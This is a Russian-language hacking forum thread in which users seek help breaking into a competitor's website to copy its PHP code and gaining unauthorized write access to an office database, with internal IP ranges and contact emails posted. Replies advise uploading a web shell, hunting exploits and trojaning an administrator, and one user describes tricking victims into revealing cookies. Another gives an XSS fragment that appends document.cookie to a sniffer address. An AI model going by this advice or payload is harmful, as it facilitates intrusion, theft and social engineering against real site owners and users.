• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

Все вопросы сюда!

ddd

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
influxe написал(а):
http://vbobr.narod.ru/programs/ICQToolZSEII.rar
эта программа для узнаваения IP по намеру аське, так же вы можете кидать бомбу и другие навороты
нуна такая прога
Нажмите для раскрытия...

Эта прога если где и есть, то давно уже не пашет. И больше всего уверен что это просто троян из серии регатель 4-ех знаков и т.п.

ЗЫ: просто протокол аськи часто меняется. А про эту прогу, инфа 2005 года.
influxe написал(а):
только не залаевайте пл3 на карелитку или как там у мну не качает от туда=(
Нажмите для раскрытия...
Если что-то хочешь скачать, а сЫлка токо на диск карелию, либо есть еще и на файловое хранилище, но она не пашет, то пиши в лс. Перезалью.
 
ddd

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
C

Cyclone

0x04
Всем привет !! У меня вопрос - есть ли способ скопировать содержимое корневой папки с ftp сайта ?? а именно php скрипты ? если известны пути к ней !и звестны пути к скриптам и всему остальному ... как посмотреть код или же сохранить скрипты ?
 
ddd

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Cyclone написал(а):
Всем привет !! У меня вопрос - есть ли способ скопировать содержимое корневой папки с ftp сайта ?? а именно php скрипты ? если известны пути к ней !и звестны пути к скриптам и всему остальному ... как посмотреть код или же сохранить скрипты ?
Нажмите для раскрытия...

Здарова :) Отвечаю по порядку задавания вопросов, не используя заумнЫе слова :)
Как я понял тЫ хочешь с левого сайта слить все скриптЫ. Чтоб скопировать содержимое корневой папки с ftp сайта, надо иметь к этому фтп доступ, а именно login и pass.
Либо ищи баги на сайте, заливай шел и сливай что тебе надо :)
Исходники php скриптов с сайта посмотреть не сможешь, токо html код :)
 
C

Cyclone

0x04
Либо ищи баги на сайте, заливай шел и сливай что тебе надо :)
Нажмите для раскрытия...

я знаю где какие права стоят , где 777 где остальное ..
причем я могу бродить по корневой папке как хочу и куда захочу указывая пути , защиты нет вообще , пока :)

к примеру заходя по адресу http://*****/include/ виже следующее ... на этой папке стоят права 777 , есть папка на которой стоят 777 права на вложенных файлах как это можно использовать ?

# class_myguests.php
# class_page.php
# class_poll.php
# class_radcodes.php
# class_ses.php
# class_upload.php
# class_url.php
# class_user.php
# database_config.php
и.т.д


просматриваю ccs таблицы и.т.д но при открытии файлов PHP выдается пустая страница...

можно пример как залить к примеру phpRemoteView ?

или есть более простой способ слить php скрипт ?

ЗЫ : учитывая то что имею такой же сайт с таким же движком .. зная что где лежит . надеюсь есть шанс скопировать код конкурента )
 
ddd

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Cyclone написал(а):
я знаю где какие права стоят , где 777 где остальное ..
причем я могу бродить по корневой папке как хочу и куда захочу указывая пути , защиты нет вообще , пока :)

к примеру заходя по адресу http://*****/include/ виже следующее ... на этой папке стоят права 777 , есть папка на которой стоят 777 права на вложенных файлах как это можно использовать ?

# class_myguests.php
# class_page.php
# class_poll.php
# class_radcodes.php
# class_ses.php
# class_upload.php
# class_url.php
# class_user.php
# database_config.php
и.т.д


просматриваю ccs таблицы и.т.д но при открытии файлов PHP выдается пустая страница...

можно пример как залить к примеру phpRemoteView ?

или есть более простой способ слить php скрипт ?

ЗЫ : учитывая то что имею такой же сайт с таким же движком .. зная что где лежит . надеюсь есть шанс скопировать код конкурента )
Нажмите для раскрытия...

Еслиб все так просто бЫло, мояб бабушка сайтЫ дефейсила и т.п. :)
Если знаешь что за двиг, то попробуй сплойтЫ поискать. Либо сам баги в коде поищи.
Если админ проекта лох то протроянить его можно. Как бЫ способов то много, токо не все смогут подойти для решения конкретной задачи :)
Да и не факт что после того как тЫ скачаешь все скриптЫ которЫе тебе нужнЫ, будут в читаемом виде. Если доработка их, и она очень ценна, то они могли и шифронуть все :)
Вообщем все зависет от ситуации.
 
S

SaTaN

0x04
у меня ситуация похожая на ту что была у SPAMer. по-порядку:
1. я мало понимаю во взломе но смыслю в компах.
2. мне нужно получить доступ к базе данных с правами администратора. при этом знаю следующее: чтобы войти туда мне нужно жестко прописать сетку (ИП, шлюзы и т.д.), доступ осуществляется через веб-форму и любой броузер и только из служебных кабинетов (если я пытаюсь так же настроить комп вне здания то не попадаю в базу).
3. у меня есть несколько логинов и паролей к ним но с очень ограниченными правами (только просмотр).
если это возможно, то подскажите, пожалуйста, как...
 
ddd

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
SaTaN, эммм, есть какой-то офис, там есть сетка, а в ней есть сервак с веб админкой, в которую можно попасть токо с определенного диапазона ип адресов?

В общем по детальней опиши.
  • Есть ли вай фай.
  • Хочешь удаленно, или с того же здания, только не из служебнЫх кабинетов.
  • Что тебе от базЫ надо, слить её, или что-то поменять там.
ЗЫ: это не так то просто будет ))
ЗЫ2: давнЫм давно, в универе, спалился за этим делом ))
 
S

SaTaN

0x04
ddd, есть несколько офисов разбросанных по городу. диапазон ИП 10.11.2.1 - 10.11.2.255. основной шлюз 10.11.2.1. ДНС сервер 10.11.2.238. попадать не из офиса необязательно. доступ в офис у меня пока есть. вай фая нету точно (на самом серваке где база). слить базу мне, в принципе, не нужно (боюсь она будет очень большой хотя стоить, если ее слить и суметь продать, будет наверное немало) нужно делать в ней изменения и добавления. дабы не спалить комп по мак адресу могу пользоваться ноутом (знаю есть еще способы подмены ИП но никогда не занимался). вобщем если это возможно - готов слушать а, при успешном окончании... из достоверных источников (сам видел) знаю, что прецеденты были но палили только ИП и сами изменения, уровень людей обслуживающих базу наверное пониже моего (может есть там конечно один какой-то гений и то тот который саму базу написал). доступ в базу происходит через браузер где вместо веб адреса указываешь 10.30.1.24. вроде все если не все спроси конкретно, может что-то забыл... заранее спасибо.

P.S. мыло: nxm@km.ru tam_gde_nas@ukr.net (так на всякий...)
 
Neuromancer

Neuromancer

Neuromancer
WebVoice
- Ну глупые вбивают в гугле: "брутфорс в контакте"
- Умные идут изучать язык программирования и заканчивают среднюю школу с отличием по математике.
- Мудрецы кладут аппарат на взлом соц. ресов., таких как контакт :) ИМХО(С) не забыл написать, значит не дурак:)
 
C

Cyclone

0x04
всегда ломаю непосредственно комп ... впихиваю левую ссылку с трояном.. а дальше как дело пойдет ... ))

хотя и были ОриГиналы ... которые сами мне куки давали ))))нужно было только попросить вставить в адресную строку javasсript:document.сооkiе; и попросить результат ))хи)
 
B

bug1z

0x04
Cyclone написал(а):
всегда ломаю непосредственно комп ... впихиваю левую ссылку с трояном.. а дальше как дело пойдет ... ))

хотя и были ОриГиналы ... которые сами мне куки давали ))))нужно было только попросить вставить в адресную строку javasсript:document.сооkiе; и попросить результат ))хи)
Нажмите для раскрытия...
Хэкер мля=/
А дело пойдет только с ламером!!!!111
javasсript:document.сооkiе - это атака вида xss, которая направлена на пользователя, вот только когда ты пихаешь в уязвимое место скрипт вида ...javasсript:document.сооkiе..., ты видишь свои куки, а чтоб украсть чужие, нужно вписать код вида ...javasсript:"Адрес снифера"+document.сооkiе...
В общем лол =/
 
Сверху